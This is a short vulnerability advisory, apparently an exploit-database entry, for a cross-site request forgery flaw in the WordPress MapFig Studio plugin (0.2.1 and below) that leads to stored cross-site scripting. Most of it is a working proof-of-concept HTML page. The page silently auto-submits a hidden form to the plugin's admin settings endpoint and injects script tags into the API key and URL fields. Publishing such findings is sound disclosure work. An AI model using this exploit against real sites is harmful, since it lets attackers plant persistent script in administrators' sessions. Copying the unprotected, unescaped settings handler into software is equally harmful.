Headline
WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting
WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.
# Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/# Version: <= 0.2.1# Tested on: Firefox# Contact me: [email protected] plugin does not have CSRF check in some places, and is missingsanitisation as well as escaping, which could allow attackers to makelogged in admin add Stored XSS payloads via a CSRF attackProof of ConceptHave a logged in admin open a page containing:<html> <body> <form action="http://example.com/wp-admin/admin.php?page=studio_settings"method="POST"> <input type="hidden" name="studio_apikey"value=""><script>alert(1)</script>" /> <input type="hidden" name="studio_url"value=""><script>alert(1)</script>" /> <input type="hidden" name="save" value="Save!" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body></html>Reference:https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/